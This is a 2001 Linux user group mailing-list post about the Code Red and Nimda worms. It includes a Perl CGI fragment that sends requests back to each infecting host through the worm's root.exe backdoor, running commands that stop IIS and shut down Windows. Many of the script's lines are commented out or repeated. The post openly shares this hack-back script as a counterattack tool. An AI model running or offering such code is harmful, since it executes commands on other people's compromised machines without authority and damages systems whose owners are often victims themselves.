[LUG] Code Red...
Samartha Deva
blug-receive at mtbwr.net
Thu Sep 27 23:35:56 MDT 2001
I am not so sure about the code.
If the "iireset+/stop" line shuts down or stops the server,
how can the next request with "SHExitWindowsEx" get
honored by the server?
I have no means of testing it but I put the "SHExitWindowsEx"
line on top so when the shutdown works, it's off anyway.
The Code Red is coming up less and less, but the next one, Nim-something,
originally Code Rainbow.
is worse. I am blocking about 1400 IP's and the most of them start
with 63....., so the worm stays pretty much within the same segment.
Samartha
## my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## print "probulating... <br>";
## my $resp = $ua->request ($iis_stop_req);
## if ($resp->is_success) {
## print "Appears we have shut down IIS...<br>";
## my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## $resp = $ua->request ($iis_stop_req);
##
## if ($resp->is_success) {
## print "Appears that we have also shutdown whatever OS
too...<br>";
## }
##
## # ok this will do magic email stuff when I get a chance to write it.
##
##
## } else {
## print "<h2>Boy! Are you yankin' my chain?!?</h2>";
## }
More information about the LUG
mailing list